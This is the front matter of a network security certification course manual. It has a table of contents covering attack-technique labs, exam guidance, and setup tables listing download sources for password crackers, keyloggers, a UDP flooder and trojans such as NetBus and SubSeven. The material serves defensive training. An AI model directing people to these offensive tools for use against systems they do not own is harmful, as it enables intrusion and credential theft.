Identifying the Weak Points of the Internet. . . . . . . . . . . . .428 Targeting the Routers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 429 Targeting the ISPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430 Targeting DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430 Task 7B-1 Identifying Weak Points of the Internet . . . . . . . . . . . . . . . 432 DNS Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432 Configuring DNS for Windows 2000 . . . . . . . . . . . . . . . . . . . . . . . . . . . 433 Task 7B-2 Installing a Standard Primary DNS Server on a Windows 2000 Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434 Reverse Lookup Zones . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434 Task 7B-3 Creating Reverse Lookup Zones . . . . . . . . . . . . . . . . . . . . . 435 Forward Lookup Zones. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435 Task 7B-4 Creating a Forward Lookup Zone . . . . . . . . . . . . . . . . . . . . . 436 Installing DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 436 Task 7B-5 Installing DNS Servers . . . . . . . . . . . . . . . . . . . . . . . . . . . 437 Zone Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437 Task 7B-6 Creating, Viewing, and Deleting Forward and Reverse Lookup Zones . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 438 Standard Secondary DNS Servers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439 Task 7B-7 Creating Secondary Zones . . . . . . . . . . . . . . . . . . . . . . . . . 439 Zone Transfers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440 Task 7B-8 Attempting Blocked Zone Transfers . . . . . 
. . . . . . . . . . . . . . 440

Ed

Describing the Components of the Internet . . . . . . . . . . . . .422 The Backbone (or Layer 1 of the Internet). . . . . . . . . . . . . . . . . . . . . . 422 Network Service Providers (NSPs) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423 Long Distance Carriers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423 NAPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423 ISPs at Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 424 The Organizations that Help Run the Internet (or Layer 8 of the Internet) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 425 DNS Revealed . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 426 Task 7A-1 Defining Internet Components . . . . . . . . . . . . . . . . . . . . . . 428

iti

on

or
DO NO

ru ct

In

st

DU

PL

IC
Contents

AT

E
xv

Topic 7D

Describing Methods Used to Attack Users . . . . . . . . . . . . . . .455 Email Hack Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455 Cookies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460 DSL and Cable Modem Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . 460 Task 7D-1 Identifying User Vulnerabilities and Internet Security Concerns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 461 Browser Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 461 General Settings for Internet Explorer 6. . . . . . . . . . . . . . . . . . . . . . . . 462 Task 7D-2 Viewing the General Settings for Your Browser . . . . . . . . . . . 462 Advanced Settings for Internet Explorer 6 . . . . . . . . . . . . . . . . . . . . . . 464 Task 7D-3 Viewing the Advanced Settings for Your Browser. . . . . . . . . . 464 Security Settings for Internet Explorer 6 . . . . . . . . . . . . . . . . . . . . . . . 466 Task 7D-4 Viewing the Zone Settings for Your Browser . . . . . . . . . . . . . 466 Default Security Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 467 Task 7D-5 Implementing Default Security Levels for Zones . . . . . . . . . . 467 The Low Security Setting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468 Task 7D-6 Viewing Detailed Settings for the Security Level Low. . . . . . . 468 The High Security Setting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469 Task 7D-7 Viewing Detailed Settings for the Security Level High . . . . . . 470 The Microsoft Virtual Machine. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471 Task 7D-8 Viewing the Custom Settings for Microsoft VM (Java Settings). 471 How to Make Best Use of These Zones . . . . . . . . . . . . . . . . . . . . . . . . . 472 Task 7D-9 Adding Sites to a Zone . . . . . . 
. . . . . . . . . . . . . . . . . . . . . 472 Cookies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473 Task 7D-10 Viewing Cookie Handling Settings. . . . . . . . . . . . . . . . . . . . 473 Content Ratings. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473 Task 7D-11 Viewing Content Ratings . . . . . . . . . . . . . . . . . . . . . . . . . . 474

Ed

Task 7C-1 Identifying Web Hacking Techniques . . . . . . . . . . . . . . . . . . 444 Web Server Security. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 444 IIS Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 445 Task 7C-2 Investigating IIS Security . . . . . . . . . . . . . . . . . . . . . . . . . 446 Web Site Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446 Task 7C-3 Implementing a Web Site . . . . . . . . . . . . . . . . . . . . . . . . . 446 Web Site Maintenance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 448 Task 7C-4 Starting and Stopping the Web Server . . . . . . . . . . . . . . . . . 448 DoS Problems. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 448 Task 7C-5 Controlling Performance Settings . . . . . . . . . . . . . . . . . . . . 449 Web Server Directory Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 449 Task 7C-6 Controlling the Home Directory Settings . . . . . . . . . . . . . . . 449 Web Server Access Controls. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 449 Task 7C-7 Controlling Access Settings . . . . . . . . . . . . . . . . . . . . . . . . 450 Patches and Hot Fixes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 451 Task 7C-8 Using the IIS Lockdown Tool . . . . . . . . . . . . . . . . . . . . . . . 452 Hot-fix Checker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 452 Task 7C-9 Using the Hot Fix Net Check Tool . . . . . . . . . . . . . . . . . . . . 453 Apache. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 454

CONTENTS

iti

on

CONTENTS

Topic 8A

Topic 8B

ru ct
Topic 8D

Scanning the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .496 Port Scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 496 The netstat Tool . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497 Service Identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497 Task 8D-1 Using nmap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499 Windows Port Scanners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499 Task 8D-2 Using SuperScan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501 Identifying the Operating System and OS Version . . . . . . . . . . . . . . . . 502 Using nmap to Identify the OS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 505 Task 8D-3 Using nmap to Identify an Operating System . . . . . . . . . . . . 506 Using the nmap Front End . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 506 Task 8D-4 Using nmap Front End . . . . . . . . . . . . . . . . . . . . . . . . . . . 507 Using Nessus to Perform a Scan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 507 Task 8D-5 Installing Nessus for First-time Use . . . . . . . . . . . . . . . . . . 510 Scanning for Vulnerabilities with Nessus . . . . . . . . . . . . . . . . . . . . . . . 510 Task 8D-6 Using Nessus for Vulnerability Scanning . . . . . . . . . . . . . . . 511 Viruses, Worms, and Trojan Horses . . . . . . . . . . . . . . . . . . . . .512 Differentiating Between a Virus and a Worm . . . . . . . . . . . . . . . . . . . . 512

st

In

Topic 8E
xvi Hardening The Infrastructure (SCP)

DO

NO

DU

PL

IC

Topic 8C

Sweeping the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .492 Ping Sweeping. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 492 Windows Ping Sweepers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 493 Task 8C-1 Using SuperScan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495

or

AT

Mapping the Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .488 Using Traceroute . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 488 Task 8B-1 Using Windows Tracing Tools . . . . . . . . . . . . . . . . . . . . . . . 489 Using traceroute on Linux. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 489 Using Graphical Tracing Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 489 Task 8B-2 Using VisualRoute . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 491

Ed

Network Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . .483 Who is the Target?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 484 Studying the Message Source . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 486

iti

LESSON 8: ATTACK TECHNIQUES

on

Using Content Ratings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 474 Task 7D-12 Configuring a Browser to Use Content Ratings . . . . . . . . . . . 474 Certificates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475 Task 7D-13 Properties of the Certificates Section . . . . . . . . . . . . . . . . . 475 Your Personal Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 476 Task 7D-14 Viewing the Handling of Personal Information by a Browser . . 476 Email Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 477 Task 7D-15 Basic Security Settings to Take Care of With Your Email Client. 477 Lesson Review 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479

The Trojan Horse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 513 The SubSeven Trojan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 513 NetBus . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 514 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 516 Task 8E-1 Using NetBus Pro . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 516

CONTENTS

Topic 8F

Malicious Web Sites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .517 Task 8F-1 Implementing a Malicious Web Site . . . . . . . . . . . . . . . . . . 517 Falling Victim to a Malicious Web Site . . . . . . . . . . . . . . . . . . . . . . . . . 518 Task 8F-2 Visiting a Malicious Web Site . . . . . . . . . . . . . . . . . . . . . . . 518

Topic 8H

Topic 8I

Topic 8J Topic 8K Topic 8L

ru ct

Social Engineering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .531 Task 8K-1 Discussing Social Engineering Examples . . . . . . . . . . . . . . . . 532 Case Study: Social Engineering . . . . . . . . . . . . . . . . . . . . . . . .532 Task 8L-1 Reviewing the Social Engineering Case Study . . . . . . . . . . . . 535

st

In

Performing a Denial of Service . . . . . . . . . . . . . . . . . . . . . . . .538 Task 8O-1 Flooding with Udpflood . . . . . . . . . . . . . . . . . . . . . . . . . . 539 OOB Exploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 539 Lesson Review 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 540

DO

Topic 8N Topic 8O

Hiding Evidence of an Attack . . . . . . . . . . . . . . . . . . . . . . . . .538

NO

Topic 8M

Gaining Unauthorized Access . . . . . . . . . . . . . . . . . . . . . . . . .535 GRUB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 537 Task 8M-1 Investigating the Single User GRUB Loader . . . . . . . . . . . . . 537

DU

PL

IC
Contents

Revealing Hidden Passwords . . . . . . . . . . . . . . . . . . . . . . . . . .529 Task 8J-1 Revealing Hidden Passwords . . . . . . . . . . . . . . . . . . . . . . . 530

or

AT

Cracking Encrypted Passwords . . . . . . . . . . . . . . . . . . . . . . . . .523 Cracking Passwords with L0pht. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 523 Task 8I-1 Using L0pht LC4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 526 Cracking Passwords with John the Ripper . . . . . . . . . . . . . . . . . . . . . . 527 Task 8I-2 Using John the Ripper . . . . . . . . . . . . . . . . . . . . . . . . . . . 527

Ed

Recording Keystrokes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .520 Task 8H-1 Using Software Keystroke Logging . . . . . . . . . . . . . . . . . . . 521 Hardware Keyloggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 521 Task 8H-2 Using a Keystroke-logging Keyboard . . . . . . . . . . . . . . . . . . 522

E
xvii

iti

Topic 8G

Gaining Control Over the System . . . . . . . . . . . . . . . . . . . . . .519 Task 8G-1 Using Netcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 519

on

CONTENTS

APPENDIX A: HARDENING THE INFRASTRUCTURE EXAM OBJECTIVES


Exam Objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .543 Glossary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .549 Index. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .567

Ed or ru ct st
xviii Hardening The Infrastructure (SCP)

In

DO

NO

DU

PL

IC

AT

iti

on

ABOUT THIS COURSE


Hardening The Infrastructure (SCP)

ABOUT THIS COURSE

Hardening the Infrastructure is designed to provide network administrators with an awareness of security-related issues and the essential skills they need to implement security in a given network. It is the first course offered in the first level of the Security Certified Program.

The Security Certified Program (SCP)

Wherever you are in life, you will find that the people around you have certain skills that help position them in the fields they want to work in. Doctors, lawyers, engineers, and architects are just a few of the many examples. So it should be no surprise that the computer and networking fields have come to create and foster certifications to help individuals prove to employers, and themselves, that they meet the required skills to perform adequately in their specific fields; be it the entry-level person beginning with a basic hardware repair technician certification or the infrastructure expert heading for the highest level of router certification.

What is the Security Certified Program?

Ascendant Learning, a Chicago-based security training organization, has created the Security Certified Program (SCP) to help develop and validate your skills as a computer and network security professional.

The SCP certifications are comprised of two vendor-neutral security certifications. The first level of certification is the Security Certified Network Professional (SCNP), and the second level of certification is the Security Certified Network Architect (SCNA).

The SCP structure is unique in that it measures competence in core security skills as well as skills needed for specific security technologies, such as Packet Structure and Signature Analysis, Operating System Hardening, Router Security, Firewalls, Virtual Private Networks (VPNs), Intrusion Detection, Risk Analysis, Digital Signatures and Certificates, Biometrics, and Network Forensics.

What is the SCNP?

The SCNP (Security Certified Network Professional) is SCP's Level One certificate, and it is primarily focused on defense. Level One deals with the protective security technologies in today's enterprise environments: TCP Packet Analysis, Operating System Hardening, Router Security, Firewall Systems, Intrusion Detection Systems (IDSs), Virus Protection, VPNs, and Disaster Recovery. The SCNP is a certification track that will test your ability to configure and maintain a secure networking environment.

What kind of experience do I need before I go for my SCNP?

Before you begin the SCNP certification track, it is recommended that, at a minimum, you attain CompTIA's Security+ certification or have equivalent training with hands-on experience. The SCNP training and certification builds on concepts and skills covered in the Security+ certification.

How do I become SCNP-certified?

The SCNP certification is comprised of two exams, Hardening the Infrastructure (HTI), and Network Defense and Countermeasures (NDC). To become SCNP-certified, candidates must pass both of these Level One exams. It is also recommended that candidates study the official courseware before taking the exams.

What are the exams like?

The exams are multiple-answer, often scenario-based, tests. The HTI exam has 90 questions, and the candidate has 90 minutes to complete the exam. At the time of this publication, the exam breakdown was as follows.

Examination Domain | Percentage of Exam
1.0 Contingency Planning | 5
2.0 Tools and Techniques | 9
3.0 Security on the Internet and the WWW | 11
4.0 Router Security and ACLs | 15
5.0 TCP/IP Packet Structure and Security | 25
6.0 Operating System Security | 35
Total | 100

Note that SCP exams are updated regularly to reflect changes in the network security industry. It is strongly recommended that potential candidates review the exam objectives at www.securitycertified.net/certifications.htm.

How do I take the exams?

There are several ways to register for an exam. To register for SCP exams over the Internet, visit Prometric at www.2test.com or VUE at www.vue.com/it/, and create an account with the vendor of your choice (if you don't already have one).

The SCP exams are available at any Prometric or VUE Testing center, in over 7,400 locations around the world.

For International Exam Registration, please check with your preferred vendor's Web site for more information.

On your exam day, try to arrive 15 minutes early so you do not feel rushed or stressed by being late. This will also give you a few minutes to review any notes before beginning your exam. However, as the SCP exams are closed-book, notes or calculators may not be brought into the testing station and will have to be left with the facility's faculty.

During the exam:

Read questions carefully. Don't jump to any conclusions!

Skip questions that you are unsure of, and come back to them at the end.

If you come back to a question and are not sure about an answer, remember that your first hunch is more often correct than your second-choice answer (after overanalyzing the question)!

Be sure to answer all questions; unanswered questions count against your score, so if you just don't have an answer, try to eliminate any options that you know are wrong and make a best guess from whatever remains.

If you have time remaining, you will be given the opportunity to review your answers. Be sure to do so, and make sure you didn't make any obvious mistakes.

How much do the exams cost?

The current price for Level One exams is $150 each (USD).

Will my certification expire?

Yes. As technologies in the security field are constantly changing, your certificate will be valid for two years starting on the date you pass the second exam. SCNPs will need to retake only the NDC exam before their SCNP certification expires. Candidates who are recertifying will be able to do so at a discounted exam rate.

What if I want to go further?

After you have become SCNP-certified and want to further your knowledge, you can move on to the second level of the SCP track.

SCP's Level Two deals with trust. Many enterprises are trying to integrate Digital Signatures, Digital Certificates, and Biometric and Smart Card authentication systems into their infrastructures. Trust, as it pertains to network security, is vital for businesses as they look to integrate their partners and suppliers into their business structures and provide real-time information and services to their customers. Level Two is about the fundamentals of building a trusted network, strong authentication techniques, encryption, biometrics, smart cards, and network forensics. SCP Level Two includes two courses, PKI and Biometrics Concepts and Planning (PBC), and PKI and Biometrics Implementation (PBI). Each course is a 40-hour program, and the content and hands-on labs are structured to develop the skills required by today's security experts.

To become a Security Certified Network Architect (SCNA), candidates must pass two exams. The first is Advanced Security Implementation (ASI), and the second is The Solution Exam (TSE), which will cover all facets of technologies covered in all of the SCP courses.

How do I prepare for the exam?

The HTI exam will require that you be familiar with the many technologies and utilities that are covered in this book. Further, the test was authored with the intention that people who have not become familiar with the technologies and utilities covered will not find it as easy to pass the exam as those who have used the programs and technologies in question. What does this all mean? It means that you really should use the utilities and programs that are covered here, rather than just read about them. You should become very familiar with all of the tasks in this book. If possible, create a home lab with at least two machines, and practice, repeatedly, the hands-on tasks in this book. Even using what you learn to help secure your own home network from hosts on the Internet will help you prepare for the exam.

Studying for the exam:

1. Read the book from start to finish, completing all tasks even if you are familiar with the technology in question. You never know when some new
facet of a technology or program may be brought up, and many of the lessons build upon the previous one. It is easy to miss something if you skip around.

2. Be sure to complete all hands-on tasks. Again, the SCP exams are based on knowledge and hands-on experience. Once you have completed a task, try doing it again.

3. Be sure to answer the Topic Review questions within each lesson. Make note of the questions you answered incorrectly, and study the appropriate sections again.

4. Before taking the SCP exams, it is recommended that you take the practice exams available through MeasureUp. More information on officially recommended practice exams is available at www.securitycertified.net/practice_tests.htm.

But perhaps the best way to make sure that you reach your goal is to register for the exam and stick to the date you set. Nothing keeps you on your toes and working toward a goal like a deadline! Honestly measure your skills, make your study schedule, set the date that you will be ready to take the exam, and register for it.

Practice exams

The only provider of practice exams authorized and recommended by the creators of the SCP is MeasureUp. Visit www.securitycertified.net/practice_tests.htm for more information.

Contact information

The Security Certified Program
U.S.: 800-869-0025
International: 630-472-5790
Email: Info@SecurityCertified.Net
Web site: www.SecurityCertified.Net

Course Prerequisites

To ensure your success, we recommend you first take the following New Horizons courses or have equivalent knowledge:

Network+ Certification - Third Edition, 2002 Objectives, A CompTIA Certification

Security+ - A CompTIA Certification

Course Objectives

When you're done working your way through this course, you'll be able to:

Investigate advanced concepts and procedures related to the TCP/IP protocol.

Work with the secure version of IP, IPSec.

Secure Linux computers and networks.

Secure Windows 2000 computers and test the effectiveness of various security measures.

Secure routers by using Access Control Lists and logging options.

Investigate measures that can help ensure business continuity in the event of a disaster, such as contingency planning and power and backup issues.

Define common Internet components, and identify techniques used in Web hacking and other attacks.

Examine and work with common techniques used to attack networks and specific operating systems.

COURSE SETUP INFORMATION

Please read the Course Setup information thoroughly, and gather all of the hardware and software listed here before you proceed with this installation.

Hardware and Software Requirements

To run this course, you will need:

The hardware listed in the following table.

Hardware Type | Quantity | Minimum Specifications
Student machines | 1 per student | 500 MHz Pentium III processor (700 MHz or higher recommended). 128 MB of RAM (256 MB or more recommended). 8 GB hard disk. Two non-integrated NICs (Intel or 3COM preferred, for promiscuous mode support). Video card (Nvidia TNT2 preferred, from the point of view of driver availability for all OSs).
Instructor machines | 1 | Same as student machines.
Cisco routers | 3 | 2500 Series preferred; IOS 12.2 or greater, with IPSec/SSH support.
Cisco console cables | 2 |
Serial cables | 2 | DCE to DTE, for connecting routers together.
Switches or hubs | 1 | 10/100 Mbps.
Hardware keylogger | |
Null-modem and crossover cables | 1 set for each pair of students | CAT 5.

For class preparation and use, the following software:

A bootable DOS floppy disk with common utilities such as FDISK, FORMAT, MSCDEX, DELPART, and so forth, is sufficient for class purposes.

The Red Hat 8.0 Linux operating system. It does not matter if you use the Personal or Professional Edition. The cost of this software is free, if you download it from www.redhat.com (or any of the various mirror sites listed there). It is recommended that you also download the installation guide. If you decide to download the OS from the Internet, download the ISO files and create CDs from the images. Choosing the Burn As Image option ensures that the CDs will be bootable.

The Windows 2000 Server operating system. The cost of an evaluation copy is $7.95, and you can obtain the software from the Microsoft Training Kits, TechNet, or http://microsoft.order-2.com/win2kast. It is assumed that each education center has a TechNet or MSDN subscription and the Windows 2000 Resource Kit.

Service Pack 2 for Windows 2000 Server. This Service Pack is free, and can be downloaded from http://download.microsoft.com/download/win2000platform/SP/SP2/NT5/EN-US/W2KSP2.exe (save the file to disk).

The Internet Explorer 6 upgrade. This upgrade is free, and can be downloaded from www.microsoft.com/windows/ie/default.asp (you might need to be connected to the Internet to do the actual upgrade).

Disk-cloning tools. Norton Ghost is recommended.

SID-changing utilities. Norton Ghostwalk is recommended.

The sysprep utility, from the Windows 2000 Resource Kit.

Hardware drivers for each OS and peripheral, especially NIC and video drivers. You should always keep these handy. In addition to having them on a CD, it is generally advisable to have a set of properly labeled floppy disks.

For use in class, you will also need to acquire the tools and utilities described in the following tables. Tables are arranged by function, such as network scanning, firewalls, and so forth. Links are provided to enable you to download files from the Web, via an HTML version of these setup instructions on the course CD. Create a Tools share (or a CD) for use in class. Download and organize the tools in an appropriate folder structure, such as in folders named Linux Tools, Windows Tools, and Miscellaneous. The Miscellaneous folder can include utilities like MS Office file viewers, file unzippers, Adobe Acrobat Reader, and so forth. The capture and signature files required for some of the tasks in the course, as well as all the RFCs, are included with each course manual.

Be aware that these tables contain tools and utilities that are not specifically used in the hands-on activities in this course.

All links listed in this document were last tested for availability on February 14, 2003.

Network Scanning Tools

Tool | OS/Cost | Used in Tasks | Download From
SuperScan | Windows/Eval is Free | Yes | www.foundstone.com/knowledge/scanning.html
Nmap | Linux/Built-in | Yes | Included in Red Hat 8.0
NmapFE | Linux/Built-in | Yes | Included in Red Hat 8.0
NmapNT | Windows/Free | No | www.eeye.com/html/Research/Tools/nmapnt/nmapNTsp1.zip
Pinger | Windows/Free | No | http://visualsoftru.com/ping/pinger.exe
Strobe | Linux, Windows/Free | No | For Linux, www.luyer.net/software/strobeclassb/
Nessus | Linux/Free | Yes | ftp://ftp.nessus.org/pub/nessus/nessus-2.0.3/nessus-installer/nessus-installer.sh
udpflood.exe | Windows/Free | Yes | www.foundstone.com/knowledge/stress_testing.html
NetScan Tools Pro | Windows/Eval is Free | No | ftp://ftp.netscantools.com/pub/nst430a.zip
Netcat | Linux, Windows/Free | Yes | For Linux, included with Red Hat 8.0. For Windows, www.atstake.com/research/tools/nc11nt.zip

Network Sniffer and Routing Tools

Tool | OS/Cost | Used in Tasks | Download From
Network Monitor | Windows/Built-in | Yes | Included in Windows 2000 Server
Ethereal 0.9.11 | Windows, Linux/Free | Yes | For Linux, included with Red Hat 8.0. For Windows, www.ethereal.com/distribution/Win32
Tcpdump | Linux/Free | No | www.tcpdump.org/
Windump | Windows/Free | No | http://windump.polito.it/install/default.htm
WinPcap 2.3 | Windows/Free | Yes | http://windump.polito.it/install/default.htm
Visual Route | Windows/Eval is free | Yes | ftp://ftp.visualware.com/pub/vr/vr.exe
NeoTrace | Windows/Eval is free | No | www.tucows.com/preview/194046.html

Password Tools

Tool | OS/Cost | Used in Tasks | Download From
L0pht Crack 2.5 | Windows/Eval is Free | No | www.32bit.bhs.com/downloads/file.asp?id=4519
L0pht Crack LC4 | Windows/Eval is Free | Yes | www.atstake.com/research/lc/application/lc4setup.exe
Crack 5.0 | Linux/Free | No | ftp://ftp.openbsd.org/pub/OpenBSD/2.7/packages/i386/crack-5.0.tgz
John the Ripper | Windows, Linux, DOS/Free | Yes (Linux version only) | For Linux, www.openwall.com/john/john-1.6.tar.gz. For Windows, www.openwall.com/john/john-1.6w.zip
Snadboy's Revelation | Windows/Free | Yes | www.snadboy.com/RevelationV2.zip

Trojan Horses and Exploit Tools

Tool | OS/Cost | Used in Tasks | Download From
Netbus | Windows/Free | No | http://nttoolbox.com/public/tools/NetBus170.zip
NetBus Pro | Windows/Free | Yes | http://home.t-online.de/home/TschiTschi/netbus_pro_eng.htm
SubSeven | Windows/Free | No | www.subseven.ws/
GetAdmin | Windows NT/Free | No | http://packetstormsecurity.org

Forensics and Keyboard Logging Tools

Tool | OS/Cost | Used in Tasks | Download or Order From
NTFSDOS | Linux/Free, DOS/Eval is free | Yes | For DOS, www.sysinternals.com/files/ntfs30r.zip (The Read-only version will do.) For Linux, linux-ntfs.sourceforge.net/info/redhat.html#how
Keylogger | Any (This is hardware.)/$89 to $199 (one per class only) | Yes | www.keyghost.com
Keystroke logger | Any (This is hardware.)/$129 to $299 (one per class only) | Yes | www.keyghost.com
Security keyboard | Any (This is hardware.)/$54.95 (one per class only) | Yes | www.electronickits.com/spy/nish/computer/key.htm
Klogger | Windows/Free | Yes | http://ntsecurity.nu/cgi-bin/download/klogger.exe.pl

Intrusion Detection Tools

Tool | OS/Cost | Used in Tasks | Download From
ISS Internet Scanner 6 | Windows/Free | No | Included with the Windows 2000 Server Resource Kit, or you can visit: www.iss.net/download/
ISS System Scanner 6 | Windows/Free | No | Included with the Windows 2000 Server Resource Kit, or you can visit: www.iss.net/download/
Snort | Linux, Windows/Free | No | www.snort.org/dl/binaries
IDSCenter | Windows/Free | No | www.snort.org/dl/contrib/front_ends

Firewalls

Tool | OS/Cost | Used in Tasks | Download From
CheckPoint NG | Windows 2000 Server with SP2/$2000 approx. (one per class only) | No | www.checkpoint.com. Part number is CPFW-FM-25-NG.
ISA Server 2000 | Windows 2000 with SP1 min./Eval is Free | No | www.microsoft.com/isaserver/evaluation/trial/default.asp

Network and Security Administration Tools

Tool | OS/Cost | Used in Tasks | Download From
IPv6 Technology Preview | Windows/Free | Yes | http://msdn.microsoft.com/downloads/sdks/platform/tpipv6/download.asp
Webmin | Any (browser-based management.)/Free | Yes | www.webmin.com. Download either the rpm or the tarball.
Tripwire | Linux/Built-in | Yes | Included with Red Hat 8.0
Bastille | Linux/Free | Yes | http://osdn.dl.sourceforge.net/sourceforge/bastille-linux/Bastille-2.0.4-1.0.i386.rpm
pwlib-1.3.3-5.i386.rpm | Linux/Free | Yes | www.bastille-linux.org/pwlib-1.3.3-5.i386.rpm
perl-Tk-800.023-9mdk.i586.rpm | Linux/Free | Yes | www.bastille-linux.org/perl-Tk-800.023-9mdk.i586.rpm
Windows 2000 Gold Standard | Windows/Free | Yes | www.cisecurity.org
PuTTY.exe | Windows/Free | Yes | http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
HiSecWeb security template | Windows/Free | Yes | http://download.microsoft.com/download/win2000srv/SCM/1.0/NT5/EN-US/hisecweb.exe
IIS Lockdown tool | Windows/Free | Yes | http://download.microsoft.com/download/iis50/Utility/2.1/NT45XP/EN-US/iislockd.exe
HFNetChk tool | Windows/Free | Yes | http://download.microsoft.com/download/win2000platform/Utility/3.3/NT45/EN-US/Nshc332.exe (For the original command-line tool, go to hfnetchk.shavlik.com/hfnetchk_3.86.0.1.exe. Or, for the new Microsoft Baseline Security Analyzer, go to download.microsoft.com/download/e/5/7/e57f498f-2468-4905-aa5f-369252f8b15c/mbsasetup.msi.)

Miscellaneous Tools

Tool | OS/Cost | Used in Tasks | Download From
